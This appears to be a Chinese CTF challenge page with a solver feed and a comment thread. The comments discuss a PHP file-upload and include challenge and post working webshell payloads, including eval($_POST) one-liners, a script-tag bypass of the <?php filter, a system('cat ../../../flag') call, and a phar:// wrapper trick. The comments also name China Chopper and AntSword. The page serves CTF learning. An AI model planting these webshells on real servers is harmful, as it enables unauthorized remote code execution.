评分(5)
解题动态

1234567nxb 攻破了该题 4小时前

lin666 攻破了该题 8小时前

jhon 攻破了该题 1天前

2021060287 攻破了该题 1天前

椰子 攻破了该题 1天前

暗A166668 攻破了该题 2天前

alizee 攻破了该题 2天前

cl20354 攻破了该题 2天前

姥姥 攻破了该题 2天前

白六真的6 攻破了该题 3天前

ysecer8 攻破了该题 3天前

qwepio 攻破了该题 3天前

baotou91 攻破了该题 3天前

jkljkl 攻破了该题 4天前

jiafeimao 攻破了该题 4天前

你文博哥哥 攻破了该题 4天前

VVang 攻破了该题 4天前

qianye 攻破了该题 4天前

凌晨3点的阳光 攻破了该题 4天前

评论
王大发财 4年前
举报
一个一个传的<script language=php>system("cat ../../../flag")</script>
onerm 4年前
举报
猜了一下,直接/flag。。。
陈江川0118 4年前
举报
无非就是换了个写一句话木马方式
yes1yi 4年前
举报
有人把flag删掉了?
a2cai 4年前
举报
不是很懂,试过<?php @eval($_POST['shell'])?>放到jpg里,然后上传后包含它,打开F12发现它其实会echo它?但会对一些字符进行转换啥的,我试的<?php和?>会转换成 _ ,然后 < 和 > 分别转换为<!-- 和-->,就不知道为啥用<script language='php'>@eval($_POST[
yswdlll 4年前
举报
phar能把压缩文件解压读取,即使这个压缩文件的后缀名改了也可以。。所以上传一个getshell的压缩文件,后缀名改成jpg或者其他。。然后通过phar://读取
onerm 4年前
举报
学到了
ycfhw1 4年前
举报
flag没被删,只是换了位置而已,这么看的话,还是连菜刀查找效率更高
hoshino 3年前
举报
哥连不上
4thrun 4年前
举报
1. 注意使用php脚本的文件包含,直接访问图片是没用的。这里index.php存在文件包含。 2. <?php ? >被过滤了
Qingwan 2年前
举报
大佬,怎么知道<?php ?>被过滤的捏
guozi 4年前
举报
喜欢有马的同学们,其实可以这样的 <script language="php">@eval($_POST[pass])</script>
Seveen1 4年前
举报
FLAG找得到,但是蚁剑连接上了后是一串乱码的文件,最后我是通过POST的内容直接进行命令执行
现在有点开心了 4年前
举报
哈哈,手动蚁剑